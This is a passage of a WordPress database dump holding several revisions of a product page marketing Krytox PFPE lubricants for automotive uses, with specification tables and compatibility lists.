°C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">Krytox™ XP2A5</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2C5</td>\r\n<td>Grease with anti-corrosion and anti-fretting additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\r\n\r\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\r\n<h4><strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong></h4>\r\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.\r\n<h4><strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong></h4>\r\nFan Clutch\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\nO-Ring Lubrication/Assembly Lube\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\r\n\r\nAlternator\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\r\n\r\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\r\n\r\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\r\n\r\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\r\n\r\nEGR Valve\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\nFigure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications\r\n\r\n<img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" />\r\n\r\nSpark Plug Boots\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\r\n\r\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\r\n<h4><strong>The following Krytox lubricants are great automotive lubricants:</strong></h4>\r\n[ux_product_categories ids="96,98,97,37,168" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive/">To learn more about non-bearing applications please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">To learn more about Krytox GPL greases and oils, please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">To learn more about Krytox AUT greases please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">To learn more about Krytox XP bearing greases please click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Solutions for the Automotive Industry', '', 'publish', 'closed', 'closed', '', 'krytox-automotive-lubricants', '', '', '2016-10-12 19:52:10', '2016-10-12 19:52:10', '', 0, 'https://www.miller-stephenson.com/?p=2390', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2391, 2, '2016-10-07 15:55:04', '2016-10-07 15:55:04', '', 'Automotive Grease', '', 'inherit', 'closed', 'closed', '', 'automotive-grease', '', '', '2016-10-07 15:55:14', '2016-10-07 15:55:14', '', 2390, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2392, 2, '2016-10-07 16:00:04', '2016-10-07 16:00:04', '<strong>Krytox™ Performance Lubricants</strong>\r\n\r\nPowered by Chemours Science… Over the last fifty years, Krytox™ performance lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\r\n\r\n<strong>Advanced Solutions for the Automotive Industry</strong>\r\n\r\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\r\n\r\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n\r\nLonger Lasting Lubrication\r\n\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n\r\n<strong>The Right Choice for Your Design Challenge</strong>\r\n\r\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong>\r\n<ul>\r\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\r\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated lubricants are made of fluorine, oxygen, and carbon only.</li>\r\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\r\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\r\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\r\n</ul>\r\n<strong>The Right Choice for Our Environment</strong>\r\n\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n\r\n<strong>Effective Over a Wide Temperature Range</strong>\r\n\r\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\r\n\r\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Grade</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 224</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n<td style="text-align: center;">60/9</td>\r\n<td style="text-align: center;">180 °C (356 °F)</td>\r\n<td style="text-align: center;">4,900+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2245</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n<td style="text-align: center;">100/12.3</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,500+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 225</td>\r\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\r\n<td style="text-align: center;">160/18</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,000+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XHT AC</td>\r\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\r\n<td style="text-align: center;">500/47</td>\r\n<td style="text-align: center;">250 °C (482 °F)</td>\r\n<td style="text-align: center;">2,000+</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Compatibility with Elastomers and Plastics</strong>\r\n\r\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\r\n<ul>\r\n 	<li>Fluorosilicone</li>\r\n 	<li>Hytrel® Polyester Elastomer</li>\r\n 	<li>Delrin® Acetal</li>\r\n 	<li>Ethylacrylate</li>\r\n 	<li>Methyl Silicone</li>\r\n 	<li>Butyl 325</li>\r\n 	<li>Neoprene WRT</li>\r\n 	<li>Kalrez® Fluoroelastomer*</li>\r\n 	<li>Zytel® Nylon</li>\r\n 	<li>Viton™ A Fluoroelastomer</li>\r\n 	<li>Nycar 100 (Buna N)</li>\r\n 	<li>Vespel®</li>\r\n 	<li>Urethane</li>\r\n 	<li>Hypalon® Synthetic Rubber</li>\r\n 	<li>EPT Peroxide Cure</li>\r\n 	<li>Hydrocarbon Rubber</li>\r\n 	<li>Teflon™ Fluoropolymer</li>\r\n</ul>\r\n<strong>Compatibility with Metals</strong>\r\n\r\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\r\n\r\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\r\n\r\n<strong>Robust Electrical Properties</strong>\r\n\r\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\r\n\r\n<strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong>\r\n\r\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\r\n\r\n<strong>Cost-Effective</strong>\r\n\r\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ lubricants reduce repair costs and potentially save millions in warranty claims.\r\n\r\nFigure 2 Krytox™ Performance Lubricants Product Range\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250">Typical Automotive Grade</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 104</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 105</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 1045</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 204</td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 214</td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 224</td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 294</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2A4</td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2045</td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2245</td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2E45</td>\r\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2A45</td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 205</td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 215</td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 225</td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 295</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2A5</td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2C5</td>\r\n<td>Grease with anti-corrosion and anti-fretting additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\r\n\r\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\r\n\r\n<strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong>\r\n\r\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal lubricants in these applications.\r\n\r\n<strong>Krytox™ Performance Lubricants for Automotive Underhood Applications</strong>\r\n\r\nFan Clutch\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\nO-Ring Lubrication/Assembly Lube\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\r\n\r\nAlternator\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\r\n\r\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\r\n\r\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\r\n\r\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\r\n\r\nEGR Valve\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless\r\n\r\n&nbsp;\r\n\r\nSpark Plug Boots\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\r\n\r\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ lubricants can prevent this fusion from taking place. Krytox™ lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\r\n\r\n&nbsp;', 'Krytox Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-revision-v1', '', '', '2016-10-07 16:00:04', '2016-10-07 16:00:04', '', 2390, 'https://www.miller-stephenson.com/2390-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2393, 2, '2016-10-12 12:54:44', '2016-10-12 12:54:44', '<h1><strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong></h1>\nPowered by Chemours Science… Over the last fifty years, Krytox™ performance lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\n\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\n<h4><strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong></h4>\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\n\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\n\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\n\nLonger Lasting Lubrication\n\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\n<h4><strong>The Right Choice for Your Design Challenge</strong></h4>\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\n<h4><strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong></h4>\n<ul>\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\n</ul>\n<h4><strong>The Right Choice for Our Environment</strong></h4>\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\n\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\n<h4><strong>Effective Over a Wide Temperature Range</strong></h4>\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\n\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\n\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\n<table width="1074">\n<tbody>\n<tr>\n<td width="250"><strong>Grade</strong></td>\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n<td style="text-align: center;">60/9</td>\n<td style="text-align: center;">180 °C (356 °F)</td>\n<td style="text-align: center;">4,900+</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n<td style="text-align: center;">100/12.3</td>\n<td style="text-align: center;">200 °C (392 °F)</td>\n<td style="text-align: center;">5,500+</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\n<td style="text-align: center;">160/18</td>\n<td style="text-align: center;">200 °C (392 °F)</td>\n<td style="text-align: center;">5,000+</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox™ XHT AC</a></td>\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\n<td style="text-align: center;">500/47</td>\n<td style="text-align: center;">250 °C (482 °F)</td>\n<td style="text-align: center;">2,000+</td>\n</tr>\n</tbody>\n</table>\n<h4><strong>Compatibility with Elastomers and Plastics</strong></h4>\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\n<ul>\n 	<li>Fluorosilicone</li>\n 	<li>Hytrel® Polyester Elastomer</li>\n 	<li>Delrin® Acetal</li>\n 	<li>Ethylacrylate</li>\n 	<li>Methyl Silicone</li>\n 	<li>Butyl 325</li>\n 	<li>Neoprene WRT</li>\n 	<li>Kalrez® Fluoroelastomer*</li>\n 	<li>Zytel® Nylon</li>\n 	<li>Viton™ A Fluoroelastomer</li>\n 	<li>Nycar 100 (Buna N)</li>\n 	<li>Vespel®</li>\n 	<li>Urethane</li>\n 	<li>Hypalon® Synthetic Rubber</li>\n 	<li>EPT Peroxide Cure</li>\n 	<li>Hydrocarbon Rubber</li>\n 	<li>Teflon™ Fluoropolymer</li>\n</ul>\n<h4><strong>Compatibility with Metals</strong></h4>\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\n\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\n\n<strong>Robust Electrical Properties</strong>\n\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\n\n<strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong>\n\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\n\n<strong>Cost-Effective</strong>\n\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.\n\nFigure 2 Krytox™ Performance Lubricants Product Range\n<table width="868">\n<tbody>\n<tr>\n<td width="250">Typical Automotive Lubricants Grade</td>\n<td style="text-align: center;" width="206">Description</td>\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-104/">Krytox™ GPL 104</a></td>\n<td>Clear, colorless oil</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a></td>\n<td>Clear, colorless oil</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ AUT 1045</td>\n<td>Clear, colorless oil</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">Krytox™ GPL 204</a></td>\n<td>White, buttery additive-free grease</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td><a 